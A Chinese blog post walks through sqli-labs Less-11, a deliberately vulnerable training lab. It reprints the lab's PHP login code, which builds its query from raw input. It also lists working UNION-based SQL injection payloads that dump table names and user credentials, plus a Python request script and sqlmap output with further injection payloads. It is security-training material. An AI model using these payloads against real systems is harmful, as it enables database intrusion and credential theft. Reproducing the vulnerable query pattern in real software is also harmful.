sqli-lab-less11

已于 2023-08-03 14:46:15 修改
阅读量103 收藏
点赞数
分类专栏: sql-lab 文章标签: 网络安全 mysql 数据库
于 2023-08-03 14:45:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Sa1nZen/article/details/132083371
版权
sqli-lab-less11

一、靶标地址

Less-11 POST-Error Based-Single quotes-String
#字符型基于报错的SQL注入
http://127.0.0.1/sqli/less-11/

二、漏洞探测

http://127.0.0.1/sqli/less-11/

使用burpsuite抓包或者
F12---Network---Request找到post的数据包

输入admin admin
得到post数据包
uname=admin&passwd=admin&submit=Submit
#Your Login name:admin
#Your Password:admin

猜测业务逻辑流程应该是根据输入的用户名password去查询然后进行比对
uname=1'&passwd=2&submit=Submit
#You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' and password='' LIMIT 0,1' at line 1

猜测语句为 '1'' and password='' LIMIT 0,1
推测语句为select username,password from users where username='$uname' and password='$passwd' limit 0,1;

三、源码分析

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
	<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
	<title>Less-11- Error Based- String</title>
</head>

<body bgcolor="#000000">
<div style=" margin-top:20px;color:#FFF; font-size:24px; text-align:center"> Welcome&nbsp;&nbsp;<font color="#FF0000"> Dhakkan </font><br></div>

<div  align="center" style="margin:40px 0px 0px 520px;border:20px; background-color:#0CF; text-align:center; width:400px; height:150px;">

<div style="padding-top:10px; font-size:15px;">
 
#表单提交
<!--Form to post the data for sql injections Error based SQL Injection-->
<form action="" name="form1" method="post">
	<div style="margin-top:15px; height:30px;">Username : &nbsp;&nbsp;&nbsp;
	    <input type="text"  name="uname" value=""/>
	</div>  
	<div> Password  : &nbsp;&nbsp;&nbsp;
		<input type="text" name="passwd" value=""/>
	</div></br>
	<div style=" margin-top:9px;margin-left:90px;">
		<input type="submit" name="submit" value="Submit" />
	</div>
</form>

</div></div>

<div style=" margin-top:10px;color:#FFF; font-size:23px; text-align:center">
<font size="6" color="#FFFF00">

<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);

// take the variables
#isset() 函数用于检测变量是否已设置并且非 NULL。
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
	$uname=$_POST['uname'];
	$passwd=$_POST['passwd'];

	//logging the connection parameters to a file for analysis.
	$fp=fopen('result.txt','a');
	fwrite($fp,'User Name:'.$uname);
	fwrite($fp,'Password:'.$passwd."\n");
	fclose($fp);


	// connectivity 
	@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
	$result=mysql_query($sql);
	$row = mysql_fetch_array($result);

	if($row)#查询得到数据回显
	{
  		//echo '<font color= "#0000ff">';	
  		
  		echo "<br>";
		echo '<font color= "#FFFF00" font size = 4>';
		//echo " You Have successfully logged in\n\n " ;
		echo '<font size="3" color="#0000ff">';	
		echo "<br>";
		echo 'Your Login name:'. $row['username'];
		echo "<br>";
		echo 'Your Password:' .$row['password'];
		echo "<br>";
		echo "</font>";
		echo "<br>";
		echo "<br>";
		echo '<img src="../images/flag.jpg"  />';	
		
  		echo "</font>";
  	}
	else #查询未得到数据无回显 语法错误回显语法报错
	{
		echo '<font color= "#0000ff" font size="3">';
		//echo "Try again looser";
		print_r(mysql_error());
		echo "</br>";
		echo "</br>";
		echo "</br>";
		echo '<img src="../images/slap.jpg" />';	
		echo "</font>";  
	}
}

?>


</font>
</div>
</body>
</html>

四、黑盒与白盒测试

@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

#查询用户和数据库
uname=1' union select user(),database() #&passwd=1&submit=Submit
#报错 这里不能使用--+ 而使用#不会报错
uname=1' union select user(),database() --+&passwd=1&submit=Submit
#uname=1不会有任何回显,所以后面的两个值可以被回显出来
select username,password from users where username='1' union select user(),database() #' and password='1' limit 0,1;

#查询表名
uname=1' union select (select group_concat(table_name) from information_schema.tables where table_schema='security'),database() #&passwd=1&submit=Submit

#查询字段名
uname=1' union select (select group_concat(column_name) from information_schema.columns where table_name='users'),database() #&passwd=1&submit=Submit

#查询字段值
uname=1' union select (select group_concat(username) from users),database() #&passwd=1&submit=Submit
uname=1' union select (select group_concat(password) from users),database() #&passwd=1&submit=Submit

五、脚本撰写

import requests

url="http://192.168.128.159/sqli/less-11/index.php"
#F12查看或者burpsuite抓包
header={
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36','Accept-Language': 'en-US,en;q=0.9',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7'
}
payload = {
        "uname" : "1' union select user(),database() #",
        "passwd" : "admin"
}
response=requests.post(url,headers=header,data=payload)
print(response.text)

六、sqlmap

sqlmap -u "http://192.168.128.159/sqli/Less-11/" --data "uname=1&passwd=1&submit=Submit" --batch

Parameter: uname (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
Payload: uname=1' OR NOT 5787=5787#&passwd=11&submit=Submit

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: uname=1' AND (SELECT 9458 FROM(SELECT COUNT(*),CONCAT(0x716a786b71,(SELECT (ELT(9458=9458,1))),0x716a706b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- QGhc&passwd=11&submit=Submit

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: uname=1' AND (SELECT 1698 FROM (SELECT(SLEEP(5)))Gmgb)-- VBGO&passwd=11&submit=Submit

Type: UNION query
Title: MySQL UNION query (NULL) - 2 columns
Payload: uname=1' UNION ALL SELECT NULL,CONCAT(0x716a786b71,0x795a5a53624c51795a4771767578594b474b72694e59424143654570547a7a4e6774636563467142,0x716a706b71)#&passwd=11&submit=Submit

七、总结

1、通过表单提交数据
2、sqlmap新用法
Sa1nZen
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs 11-20
记录一些有用的东西
12-12 325
Less-11 手工注入 1.开始为post类型的注入,先加个单引号,报错如下。 构造出SQL语句应该为:select username,password from users where username=' ' ' and password=' 2' limit 0,1; 也即是password字段被单引号包含了' and password=',导致 出现2' limit 0,1;引号不匹配的情况。下图看起来更直观些。 2.所以,可构造如下语句:' # 。 #把后面的都注释掉,然后在其前面加上自己构
sqli-labs靶场Less-11
songling515010475的专栏
08-25 130
1、访问首页,/Less-10/index.php,这里的传参点是表单中的uname、passwd 探测六步 判断是否是数字形传参 判断是否有单引号闭合 admin' -- qwe 判断是否是双引号闭合 判断是否单引号+括号闭合 判断是否是双引号+括号闭合 判断是否是延时盲注 分析:这里是通过单引号闭合,注释掉后面的SQL直接绕过登录 2、通过在uname后面拼接参数 order by 1~3 ,如下图3的时候提示没有3个字段,只有2个。 3、通过uni...
sqli-labs/Less-11
m0_71299382的博客
11-18 175
sqli-labs第十一关
[网络安全]sqli-labs Less-11 解题详析
等风来
07-29 2305
以上为[网络安全]sqli-labs Less-11 解题详析,后续将分享[网络安全]sqli-labs Less-12 解题详析,请读者躬身实践。我是秋说,我们下次见。
SQLi-Labs》03. Less 17~22
学习学习学习......
05-06 480
update 类型注入,insert 类型注入,extractvalue 报错注入,updatexml 报错注入,group by 报错注入,http 头传递 payload。
sqli-labs Less-11,12
2202_75317918的博客
05-21 719
sqli-labs Less-11,12
sqli-labs(less-11)
不知名白帽的博客
07-17 663
sqli-labs(less-11)。less-11(POST注入)
sqli-lab通关txt
07-22
在这个sqli-lab通关txt文件中,我们预计会找到一系列关于SQL注入攻击的实战教程,主要涵盖了从基础到进阶的10个不同阶段的练习。 SQL注入通常发生在Web应用中,当用户输入的数据没有被正确地过滤或转义,导致这些...
第三节 Sqli-lab环境搭建-01
09-15
Sqli-lab环境搭建-01 在本节中,我们将讨论如何搭建Sqli-lab环境,包括安装PhpStudy环境、火狐浏览器插件、Sqlmap和Sqli-Lab等工具。这些工具将帮助我们学习SQL注入漏洞检测和利用。 PhpStudy环境安装 PhpStudy是...
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-lab注入练习源码
06-25
Sqli-lab是一个专门设计用于SQL注入学习和实践的平台,它为初学者和经验丰富的安全专家提供了多种级别的练习,帮助他们了解并掌握如何防止这种攻击。 首先,我们来详细了解SQL注入的基本原理。当Web应用程序接收...
sqli-lab操作详解
07-12
本篇文章将详细讲解SQL注入漏洞以及如何在`sqli-lab`这个实践环境中进行操作。 一、SQL注入的理解 SQL注入的基本原理是利用程序对用户输入数据的不当处理,使得恶意SQL代码能够与服务器上的数据库交互。当Web应用未...
sqli-labs (less-11)
kukudeshuo的博客
03-09 2685
sqli-labs (less-11) 补充知识 从第11关开始我们发现跟以前的页面已经完全不一样了,这里要我们输入用户名和密码 假设我们现在注册了一个账号,账号为admin,密码为admin,我们登入进去看看 登入进去之后我们发现屏幕上回显了我们输入的账号和密码,但是url那里却没有返回我们输入的账号和密码,因为前面的关卡我们输入的内容都是以GET方式传输到了服务端,而这里我们输入的账号密码是以POST的方法传输到了服务端 GET请求和POST请求的区别 GET请求: GET方法用于获取请求页面的指定
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8332
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
mysql笔记1
m0_62975692的博客
07-11 348
首先查看systemctl status mysqld,如果是关闭的可以进入的配置文件打开mysql,我的mysql配置文件就是在/usr/local/mysql/support-filess/下,在此目录下执行./mysql.server start,打开mysql服务,也可以通过systmectl start mysqld,如果你嫌麻烦的话可以systemctl enable mysqld 一直打开mysql的服务;重新给字段添加约束的时候不可以添加not null约束的!
MySQL 进阶(三)【SQL 优化】
最新发布
梦想是动物管理员
07-13 911
MySQL SQL 优化
mysql bit 对gorm使用何种类型?
gdutlhh的专栏
07-11 274
目前我们在查询mysql后拿到的src 其实是[]uint8类型(实际上就是 []byte),接着就进入了case []byte 分支,然后这里直接把原数据通过string(s) 强制转换成字符串,导致原来的值 0x01 变成了字符面值为 SOH (通过查看ASCII表)代表标题开始的字符。只要你的类型实现了该接口,那么就可以操作bit类型了,于是我自定义了类型来接收bit类型。可见,在底层解析过程中,并不能把mysql的bit类型转化成go的bool。其实sql包提供了,scan接口:如下。
MySQL空间索引
你的指尖有改变世界的力量
07-10 268
空间类型是建立在空间类型字段上的。
mysql快速精通(一)DQL数据查询语言
不起眼小菜菜的博客
07-10 1101
文章建立在已知基础用法的前提下进行深入了解……
sqli-lab安装
09-05
要安装sqli-lab,您需要按照以下步骤进行操作: 1. 首先,确保您具有Web服务器环境。您可以使用Apache、Nginx或其他适合您的环境的Web服务器。 2. 下载sqli-lab的代码。您可以从GitHub存储库中获取它,链接:https://github.com/Audi-1/sqli-labs 。 3. 将下载的代码解压缩到您的Web服务器的根目录下。 4. 创建一个MySQL数据库,并导入提供的SQL文件。您可以在"sqli-labs/db-creds.inc"文件中找到数据库凭据。将该文件重命名为"db-creds.inc.php"并填写正确的数据库信息。 5. 现在,您应该能够通过访问"http://your-server-ip/sqli-labs/"来访问sqli-lab。 请注意,sqli-lab是一个用于学习和测试SQL注入漏洞的实验室环境。确保在安装和使用过程中采取适当的安全措施,不要将其用于非法目的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值